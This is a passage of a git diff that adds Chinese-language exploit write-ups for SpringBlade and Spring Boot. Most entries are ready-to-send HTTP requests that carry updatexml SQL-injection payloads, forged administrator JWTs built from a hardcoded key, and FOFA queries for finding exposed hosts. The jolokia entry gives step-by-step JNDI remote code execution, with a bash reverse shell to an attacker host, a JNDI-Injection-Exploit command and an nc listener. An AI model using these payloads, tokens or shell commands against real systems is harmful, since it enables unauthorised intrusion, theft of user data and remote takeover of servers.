eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +``` + +![1713236352998-9826b36e-1662-4854-b88f-d07dc13498d5.png](./img/eKNle2a8FR_4cOKY/1713236352998-9826b36e-1662-4854-b88f-d07dc13498d5-184725.png) + +```java +c4ca4238a0b923820dcc509a6f75849 +``` + +sqlmap + +```java + +``` + + + +> 更新: 2024-12-13 17:10:57 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wpz38hmzaeugpctm> \ No newline at end of file diff --git a/SpringBladeerror_list存在SQL注入漏洞.md b/SpringBladeerror_list存在SQL注入漏洞.md new file mode 100644 index 0000000..bf05dba --- /dev/null +++ b/SpringBladeerror_list存在SQL注入漏洞.md 
@@ -0,0 +1,31 @@ +# SpringBlade error/list 存在SQL注入漏洞 + +# 一、漏洞简介 +SpringBlade /api/blade-log/error/list路径存在安全漏洞,攻击者利用该漏洞进行SQL注 入攻击 + +# 二、影响版本 ++ SpringBlade + +# 三、资产测绘 ++ `<font style="color:rgb(63, 63, 63);">body="https://bladex.vip"</font>` + +![1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71.png](./img/BZdErnm7v21TUqLj/1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71-817083.png) + +# 四、漏洞复现 +```java +GET /api/blade-log/error/list?updatexml(1,concat(0x7e,md5(1),0x7e),1)=1 HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Accept: */* +Connection: Keep-Alive +Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +``` + +![1710407897035-51869d8b-325a-46cf-84c9-d54a254547cf.png](./img/BZdErnm7v21TUqLj/1710407897035-51869d8b-325a-46cf-84c9-d54a254547cf-741901.png) + + + +> 更新: 2024-12-13 17:10:57 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zrkt4t6xd5xn3yek> \ No newline at end of file diff --git a/SpringBladeexport-user存在SQL注入漏洞.md b/SpringBladeexport-user存在SQL注入漏洞.md new file mode 100644 index 0000000..86f4ed8 --- /dev/null +++ b/SpringBladeexport-user存在SQL注入漏洞.md 
@@ -0,0 +1,32 @@ +# SpringBlade export-user 存在 SQL注入漏洞 + +# 一、漏洞简介 +SpringBlade v3.2.0 及之前版本框架后台 export-user 路径存在安全漏洞,攻击者利用该漏洞可通过组件customSqlSegment 进行SQL注 入攻击,攻击者可将用户名、密码等敏感信息通过 excel 导出。 + +# 二、影响版本 ++ SpringBlade v3.2.0 + +# 三、资产测绘 ++ fofa`body="[https://bladex.vip"](https://bladex.vip") && title!="融媒体中心后台管理系统" && title!="尚牛电竞运营后台"` ++ 特征 + +![1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71.png](./img/_NYAM1MaHtnpei3i/1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71-917073.png) + +# 四、漏洞复现 +```java +GET /api/blade-user/export-user?Blade-Auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.UHWWVEc6oi6Z6_AC5_WcRrKS9fB3aYH7XZxL9_xH-yIoUNeBrFoylXjGEwRY3Dv7GJeFnl5ppu8eOS3YYFqdeQ&account&realName&1-updatexml(1,concat(0x7e,(select+@@version),0x7e),1)=1 HTTP/1.1 +Host: {hostname} +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +``` + +![1703260289968-ee5e0878-4c51-4107-a3a4-f5f6fe02e2f3.png](./img/_NYAM1MaHtnpei3i/1703260289968-ee5e0878-4c51-4107-a3a4-f5f6fe02e2f3-416322.png) + + + +> 更新: 2024-12-13 17:10:57 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xgx1k1ortg8i6rp0> \ No newline at end of file diff --git a/SpringBlademenu_list存在SQL注入漏洞.md b/SpringBlademenu_list存在SQL注入漏洞.md new file mode 100644 index 0000000..2917e0c --- /dev/null 
+++ b/SpringBlademenu_list存在SQL注入漏洞.md @@ -0,0 +1,28 @@ +# SpringBlade menu/list存在SQL注入漏洞 + +# 一、漏洞简介 +SpringBlade menu/list存在SQL注入漏洞,攻击者利用该漏洞进行SQL注 入攻击 + +# 二、影响版本 ++ SpringBlade + +# 三、资产测绘 ++ `<font style="color:rgb(63, 63, 63);">body="https://bladex.vip"</font>` + +![1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71.png](./img/NmezmB28oxn8h0Aq/1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71-536775.png) + +# 四、漏洞复现 +```java +GET /api/blade-system/menu/list?updatexml(1,concat(0x7e,md5(1),0x7e),1)=1 HTTP/1.1 +Host: +User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0 +Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ +Connection: close +``` + +![1722875246289-eb2f34cb-92d8-49de-a81b-3479b1c8353a.png](./img/NmezmB28oxn8h0Aq/1722875246289-eb2f34cb-92d8-49de-a81b-3479b1c8353a-514494.png) + + + +> 更新: 2024-12-13 17:10:56 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xz7mg8lxlbnt5kp0> \ No newline at end of file diff --git a/SpringBladenotice-list存在SQL注入漏洞.md b/SpringBladenotice-list存在SQL注入漏洞.md new file mode 100644 index 0000000..80b3bef --- /dev/null +++ b/SpringBladenotice-list存在SQL注入漏洞.md 
@@ -0,0 +1,28 @@ +# SpringBlade notice-list存在SQL注入漏洞 + +# 一、漏洞简介 +SpringBlade notice-list存在SQL注入漏洞,攻击者利用该漏洞进行SQL注 入攻击 + +# 二、影响版本 ++ SpringBlade + +# 三、资产测绘 ++ `<font style="color:rgb(63, 63, 63);">body="https://bladex.vip"</font>` + +![1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71.png](./img/a9mL4-osLnPli5pE/1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71-628650.png) + +# 四、漏洞复现 +```java +GET /api/blade-desk/notice/list?updatexml(1,concat(0x7e,user(),0x7e),1)=1 HTTP/1.1 +Host: +User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ +Connection: close +``` + +![1722873935072-a9fe204f-3359-4915-9391-43c010302e49.png](./img/a9mL4-osLnPli5pE/1722873935072-a9fe204f-3359-4915-9391-43c010302e49-809108.png) + + + +> 更新: 2024-12-13 17:10:56 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/idn8r1ruwfgzvw80> \ No newline at end of file diff --git a/SpringBladeoss-list存在敏感信息泄露.md b/SpringBladeoss-list存在敏感信息泄露.md new file mode 100644 index 0000000..0b7baa4 --- /dev/null +++ b/SpringBladeoss-list存在敏感信息泄露.md 
@@ -0,0 +1,28 @@ +# SpringBlade oss-list存在敏感信息泄露 + +# 一、漏洞简介 +SpringBlade oss-list存在敏感信息泄露漏洞 + +# 二、影响版本 ++ SpringBlade + +# 三、资产测绘 ++ `<font style="color:rgb(63, 63, 63);">body="https://bladex.vip"</font>` + +![1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71.png](./img/0xN12jNa7AiTLwb2/1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71-932459.png) + +# 四、漏洞复现 +```java +GET /api/blade-resource/oss/list HTTP/1.1 +Host: +User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ +Connection: close +``` + +![1722874954212-1f03a047-380f-4f1e-8ed9-65fab9ab13ba.png](./img/0xN12jNa7AiTLwb2/1722874954212-1f03a047-380f-4f1e-8ed9-65fab9ab13ba-625732.png) + + + +> 更新: 2024-12-13 17:10:56 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ocwnh58qqdgndhlk> \ No newline at end of file diff --git a/SpringBladetenant-list存在SQL注入漏洞.md b/SpringBladetenant-list存在SQL注入漏洞.md new file mode 100644 index 0000000..4a48835 --- /dev/null +++ b/SpringBladetenant-list存在SQL注入漏洞.md 
@@ -0,0 +1,31 @@ +# SpringBlade tenant-list存在SQL注入漏洞 + +# 一、漏洞简介 +SpringBlade tenant-list存在SQL注入漏洞,攻击者利用该漏洞进行SQL注 入攻击 + +# 二、影响版本 ++ SpringBlade + +# 三、资产测绘 ++ `<font style="color:rgb(63, 63, 63);">body="https://bladex.vip"</font>` + +![1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71.png](./img/01HOTDbFk8XLc-SW/1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71-948490.png) + +# 四、漏洞复现 +```java +GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,md5(123456),0x7e),1)=1 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ +``` + +![1716997675480-3df10816-9fd3-4a5b-9919-73fe9e7af8cd.png](./img/01HOTDbFk8XLc-SW/1716997675480-3df10816-9fd3-4a5b-9919-73fe9e7af8cd-781690.png) + +```java +e10adc3949ba59abbe56e057f20f883 +``` + + + +> 更新: 2024-12-13 17:10:57 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tt8olbrv29tcosdn> \ No newline at end of file diff --git a/SpringBladeuser-list存在敏感信息泄露漏洞.md b/SpringBladeuser-list存在敏感信息泄露漏洞.md new file mode 100644 index 0000000..af848b3 --- /dev/null +++ b/SpringBladeuser-list存在敏感信息泄露漏洞.md 
@@ -0,0 +1,28 @@ +# SpringBlade user-list存在敏感信息泄露漏洞 + +# 一、漏洞简介 +SpringBlade user-list存在敏感信息泄露漏洞 + +# 二、影响版本 ++ SpringBlade + +# 三、资产测绘 ++ `<font style="color:rgb(63, 63, 63);">body="https://bladex.vip"</font>` + +![1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71.png](./img/kDsv0JfSIt1Ixdvd/1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71-700920.png) + +# 四、漏洞复现 +```java +GET /api/blade-user/user-list HTTP/1.1 +Host: +User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ +Connection: close +``` + +![1722874765706-4a275b38-6986-4e1e-a324-7ef2c8b9fa24.png](./img/kDsv0JfSIt1Ixdvd/1722874765706-4a275b38-6986-4e1e-a324-7ef2c8b9fa24-855020.png) + + + +> 更新: 2024-12-13 17:10:56 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/mcvxfkt0ki0867bi> \ No newline at end of file diff --git a/SpringBladeusual-list存在SQL注入漏洞.md b/SpringBladeusual-list存在SQL注入漏洞.md new file mode 100644 index 0000000..04c0244 --- /dev/null +++ b/SpringBladeusual-list存在SQL注入漏洞.md 
@@ -0,0 +1,28 @@ +# SpringBlade usual-list存在SQL注入漏洞 + +# 一、漏洞简介 +SpringBlade usual-list存在SQL注入漏洞,攻击者利用该漏洞进行SQL注入攻击 + +# 二、影响版本 ++ SpringBlade + +# 三、资产测绘 ++ `<font style="color:rgb(63, 63, 63);">body="https://bladex.vip"</font>` + +![1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71.png](./img/UrhsBBU4enGgnTv_/1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71-979030.png) + +# 四、漏洞复现 +```java +GET /api/blade-log/usual/list?updatexml(1,concat(0x7e,user(),0x7e),1)=1 HTTP/1.1 +Host: +User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ +Connection: close +``` + +![1722874655789-f2bdb393-4984-4ec8-b3fc-686b5e59b4ca.png](./img/UrhsBBU4enGgnTv_/1722874655789-f2bdb393-4984-4ec8-b3fc-686b5e59b4ca-732552.png) + + + +> 更新: 2024-12-13 17:10:56 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xkw7kw5b99sih1la> \ No newline at end of file diff --git a/SpringBlade存在硬编码密钥漏洞.md b/SpringBlade存在硬编码密钥漏洞.md new file mode 100644 index 0000000..f661a5c --- /dev/null +++ b/SpringBlade存在硬编码密钥漏洞.md 
@@ -0,0 +1,30 @@ +# SpringBlade 存在硬编码密钥漏洞 + +# 一、漏洞简介 +SpringBlade 存在硬编码密钥漏洞。 + +# 二、影响版本 ++ SpringBlade + +# 三、资产测绘 ++ `<font style="color:rgb(63, 63, 63);">body="https://bladex.vip"</font>` + +![1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71.png](./img/PHANNrjTK85iKF79/1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71-649072.png) + +# 四、漏洞复现 +```plain +GET /api/blade-user/info HTTP/1.1 +Host: +User-Agent: python-requests/2.31.0 +Accept-Encoding: gzip, deflate +Accept: */* +Connection: close +Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ +``` + +![1711951677631-572e0290-8233-4ed1-898a-f96f1c73c3ba.png](./img/PHANNrjTK85iKF79/1711951677631-572e0290-8233-4ed1-898a-f96f1c73c3ba-191658.png) + + + +> 更新: 2024-12-13 17:10:56 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ffc80mpe9xmcekvp> \ No newline at end of file diff --git a/SpringBootjolokiaRealmJNDI远程代码执行漏洞.md b/SpringBootjolokiaRealmJNDI远程代码执行漏洞.md new file mode 100644 index 0000000..f2009d7 --- /dev/null +++ b/SpringBootjolokiaRealmJNDI远程代码执行漏洞.md 
@@ -0,0 +1,87 @@ +# Spring Boot jolokia Realm JNDI远程代码执行漏洞 + +# 一、漏洞简介 +Actuator 是 Spring Boot 提供的服务监控和管理中间件。当 Spring Boot 应用程序运行时,它会自动将多个端点注册到路由进程中。当配置`jolokia/list`接口,且访问`jolokia/list`接口存在`type=MBeanFactory`和`createJNDIRealm`关键字时,存在`Spring jolokia Realm JNDI`远程代码执行漏洞。 + +## 二、影响版本 ++ Spring Boot < 1.5 默认未授权访问所有端点 ++ Spring Boot >= 1.5 默认只允许访问/health和/info端点,但是此安全性通常被应用程序开发人员禁用 + +Spring Boot 1.x版本端点在根URL下注册。 + +![1698576714277-71a73073-04b0-4a3c-966d-bba57e4944b9.png](./img/lD151wknq39V0bAQ/1698576714277-71a73073-04b0-4a3c-966d-bba57e4944b9-347569.png) + +Spring Boot 2.x版本端点移动到/actuator/路径。 + +![1698576733486-183446b7-1066-4c12-9181-e16cb0df831d.png](./img/lD151wknq39V0bAQ/1698576733486-183446b7-1066-4c12-9181-e16cb0df831d-027623.png) + +# 三、系统特征 +1. 网站图片文件是一个绿色的树叶。 + + + +![1698576979706-f936398d-5236-4f6d-a518-474733394877.png](./img/lD151wknq39V0bAQ/1698576979706-f936398d-5236-4f6d-a518-474733394877-560639.png) + +2. 特有的报错信息。 + +![1698576999220-8efdd199-4150-4cab-80c5-6d727340149c.png](./img/lD151wknq39V0bAQ/1698576999220-8efdd199-4150-4cab-80c5-6d727340149c-322932.png) + +3. 存在`/jolokia/list`接口 + +![1698577033216-3270b605-0da8-421d-97f8-cfc8baa55626.png](./img/lD151wknq39V0bAQ/1698577033216-3270b605-0da8-421d-97f8-cfc8baa55626-943670.png) + +# 四、漏洞复现 +1. 确认存在`type=MBeanFactory`和`createJNDIRealm`关键字时,存在Spring jolokia Realm JNDI远程代码执行漏洞 + +![1698577944981-d1cd174f-c5f9-4361-9b31-2c765873cdf8.png](./img/lD151wknq39V0bAQ/1698577944981-d1cd174f-c5f9-4361-9b31-2c765873cdf8-560420.png) + +![1698578013109-7e54d965-932c-4f56-80c0-9d1d0fd17a52.png](./img/lD151wknq39V0bAQ/1698578013109-7e54d965-932c-4f56-80c0-9d1d0fd17a52-816439.png) + +2. 生成反弹shell命令 + +```plain +/bin/bash -i >& /dev/tcp/xx.xx.xx.xx/7777 0>&1 +``` + +2. 将上述反弹shell命令base64编码后替换到下述`command`字符处,`vps`处填写为`vps ip` + +```plain +java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,command}|{base64,-d}|{bash,-i}" -A "vps" +``` + +3. 
将`JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar`上传到vps中运行上述命令 + +[JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar](https://www.yuque.com/attachments/yuque/0/2024/jar/1622799/1709222253187-2cb205fa-03a1-4c83-b20d-15ef97031929.jar) + +![1698577387014-60a6f59b-e08b-46ae-8cd0-2adbd24dc7dc.png](./img/lD151wknq39V0bAQ/1698577387014-60a6f59b-e08b-46ae-8cd0-2adbd24dc7dc-960558.png) + +4. 修改 expliot 中的 url 和 rmi 地址 + +[exploit.py](https://www.yuque.com/attachments/yuque/0/2024/py/1622799/1709222253494-e1aea116-ca7d-4438-bcaa-3c9b5188ff09.py) + +![1698577518599-c06c9711-aace-4078-a8f8-ec67e5d0e4a8.png](./img/lD151wknq39V0bAQ/1698577518599-c06c9711-aace-4078-a8f8-ec67e5d0e4a8-478851.png) + +![1698577467774-16a487a1-d095-4973-ac7e-9320596f094f.png](./img/lD151wknq39V0bAQ/1698577467774-16a487a1-d095-4973-ac7e-9320596f094f-552345.png) + +4. nc 监听端口 + +```plain +nc -lvvp 7777 +``` + +![1698577554789-09ca2754-5c88-4810-8889-e9c6b9fbe0d1.png](./img/lD151wknq39V0bAQ/1698577554789-09ca2754-5c88-4810-8889-e9c6b9fbe0d1-869854.png) + +5. 执行exp收到反弹shell + +```plain +python3 exploit.py +``` + +![1698577713992-325f1991-81a1-4e32-9088-607fffc268ef.png](./img/lD151wknq39V0bAQ/1698577713992-325f1991-81a1-4e32-9088-607fffc268ef-793843.png) + +![1698577666540-851adfb8-d788-44e5-807b-276e44ee32a4.png](./img/lD151wknq39V0bAQ/1698577666540-851adfb8-d788-44e5-807b-276e44ee32a4-019562.png) + + + +> 更新: 2024-02-29 23:57:33 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/asne342gkdk4cde8> \ No newline at end of file diff --git a/SpringDataMongoDBSpEL表达式注入漏洞.md b/SpringDataMongoDBSpEL表达式注入漏洞.md new file mode 100644 index 0000000..d52fcda --- /dev/null +++ b/SpringDataMongoDBSpEL表达式注入漏洞.md 